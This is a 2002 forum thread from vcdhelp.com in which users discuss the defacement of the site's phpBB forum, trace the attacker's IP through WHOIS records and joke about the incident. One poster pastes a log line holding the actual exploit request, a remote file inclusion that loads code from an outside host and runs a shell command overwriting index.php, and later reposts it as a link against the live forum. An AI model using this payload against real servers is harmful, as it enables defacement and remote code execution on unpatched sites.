Who hacked the forum????

[NeWcS]

Tried to get on the site an hour or so ago and it looks like someone hacked it.

Said something Like "Hacked by (SOMEONEs NAME)"


I sent an email w/ a screen shot to the site admin. Just wanted to know if anyone know who it was that did the hacking?????

Thanx

[Baldrick]

yep it was hacked and I found this in the log that looks kinda suscspious:
195.131.85.178 - - [30/Mar/2002:10:09:34 -0600] "GET /includes/db.php?phpbb_root_path=http://mzfk1.narod.ru/&dbms=mysql&phpEx=txt&cmd=echo%20'Hacked%20by%20Mr .X3%20Repair!'%20>%20../index.php HTTP/1.1" 200 166 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"

[Baldrick]

i found that it is kinda easy to hack this version of phpbb rc2 and lots users have tried alot, receive passwords and everything...

[baker]

[baker]

wheres the posts thingy gone under peoples names as well?

Baker

[d4n13l]

It was just a lame script kiddie by the looks of it.

Baldrick,
Try Emailing these people. I think it is the attackers ISP, it's Russian though. Firstly, try Emailing abuse@wplus.net and tell them what happened, give them the time it happened and the IP (195.131.85.178, which resolves back to "ip85-178.dialup.wplus.net") - Give them the same details out of the logs that you gave here.
The only email address I could find on their site was support@wplus.net, so try that as a last resort.
Cant find out too much more as I dont speak Russian...


BTW
Looks like he only has a dialup account so it was probably a dynamic IP: Shame, as I would have liked to have given him a "little surprise" if he had a static IP...

[d4n13l]

I hope that you have patched it; I think that you have posted the hack...
LOL

[baker]

well you could use www.translate.ru to translate the russian-english?

Baker

[Greg12]

How do you read IP's

[d4n13l]

well you could use www.translate.ru to translate the russian-english?

Baker

Translating the two URLs just threw back crap, a lot of broken/poor English. I couldnt really make sense of it...

greg12,
Learn about DNS and WhoIs queries.

[mol3000]

d4n13l, i always wanted to know how to find out a hacker..... how did you find all of that out ?????? is there a site or small tutorial i can read or go to??????

[d4n13l]

I cant really go into too much detail; the post would be huge, so I will give you the basic steps:
All you need is an IP to go on. You can see the IP in the log that Baldrick gave - 195.131.85.178. When you resolve that (read what I said to greg12 about doing that), it gives you "ip85-178.dialup.wplus.net". That tells me that the guys ISP is called "wplus.net" - I confirmed that by opening www.wplus.net in a browser, it was a Russian ISP. The "dialup" part of it leads me to think that it was a dialup account, so it is *probably* a dynamic IP address: So best not try to attack that IP, it could very well be someone else now - Each time the guy dials his ISP he is assigned a differnet IP. I could try to determine for certain that it was a dynamic IP, but that is another topic...
As for tutorials, I cant recall any. Just search for some, thats the best way to find them.
If you are interested in nailing hackers, it would be a good idea to run a firewall (if you are running windows anyway) - firewalls are a good way to obtain logs of traffic to and from your computer. They also have the benefit of keeping you pretty safe from hackers, if they are configured correctly.


PS
"abuse@" is a common Email address for reporting abuse to an ISP.
And I could tell that he was a script kiddie becuase of the request that he gave the server. It is an easy hack...

[pacmania_2001]

For a simple guide on how to trace IP's have a look at this site I put together

www.traceit.cjb.net

[NeWcS]

Heres some info on that IP:

Code:

Registrant:
Webplus Ltd. (WPLUS2-DOM)
   Webplus Ltd., M. Sadovaja, 3/54,
   St.Petersburg, 191186
   RU

   Domain Name: WPLUS.NET

   Administrative Contact, Technical Contact, Billing Contact:
      WEBPlus DnsMaster  (WP15-ORG)  dnsmaster@WPLUS.NET
      WEBPlus Ltd.
      Kolomenskaja, 29
      St-Petersburg
      RU
      +7 812 3269020
      Fax- +7 812 3269029

   Record last updated on 07-Aug-2001.
   Record expires on 12-Aug-2003.
   Record created on 11-Aug-1996.
   Database last updated on 30-Mar-2002 15:11:00 EST.

   Domain servers in listed order:

   NS.WPLUS.NET			194.8.160.90
   NS1.WPLUS.NET		195.131.52.130
   NS.PU.RU			193.124.85.219

====================================

 195.131.50.0 - 195.131.52.255
WEBPlus Ltd.
St.Petersburg

--------------------------------------------------------------------------------
 
 Vladiminr E. Filyunin
WEBplus Ltd.
Kolomenskaja 29
St. Petersburg, Russia 191119
+7 812 3269020
+7 812 3269029
vvph@wplus.net

--------------------------------------------------------------------------------
 
 Michael V. Vasiliev
ZAO WebPlus, 29 Kolomenskaya
191119, Saint-Petersburg
Russia
+7 812 3269020
+7 812 3269029
mikhail@wplus.net

--------------------------------------------------------------------------------
 
 Alexey V. Ushakov
WEBplus Ltd.
Kolomenskaja 29
St. Petersburg, Russia 191119
+7 812 3269020
alexey@wplus.net

--------------------------------------------------------------------------------
 
 Alexander I. Phillichev
WEBplus Ltd.
Kolomenskaja 29
St. Petersburg, Russia 191119
+7 812 3269020
phil@wplus.net

[MOVIEGEEK]

It was probably former President Yeltsin,that wacky guy will do anything
for a laugh.

[Baldrick]

now have I patched it so it wont be that easy to hack anymore
try
Repair!'%20>%20../index.php]http://forum.vcdhelp.com/includes/db.php?phpbb_root_path=http://mzfk1.narod.ru/&dbms=mysql&phpEx=txt&cmd=echo%20'Hacked%20by%20Mr .X3%20Repair!'%20>%20../index.php[/url]

[d4n13l]

LOL, nice one Baldrick.

[smokingweed3000]

it seems like someone hacked it again casue when I went to vcdhelp.com today there was a "HACKED" sign at the top and there was a face under it.

[Guyver]

I think the whole site just got hacked, when going to www.vcdhelp.com I got a weird screen saying it was hacked and then it redirected to the main page

[mikejl29]

Under the picture, it says it was hacked by 51R PH34R..........

[Contact64]

C'mon guys...it looks more like a April Fool, doesn't it?

Or am I wrong here?

[frank]

Come on take a look at the calendar.

[zzyzzx]

I think we should ask all VCDHELP regulars who live in St Petersburg to get togather and go over to the hackers place and kick their asses.

[M_immenses]

51R PH34R eh????

Sir Phear, ohhh im running out to buy new underwear now!!!

[OptimusPrime22]

yeah it is still showing that picture and redirecting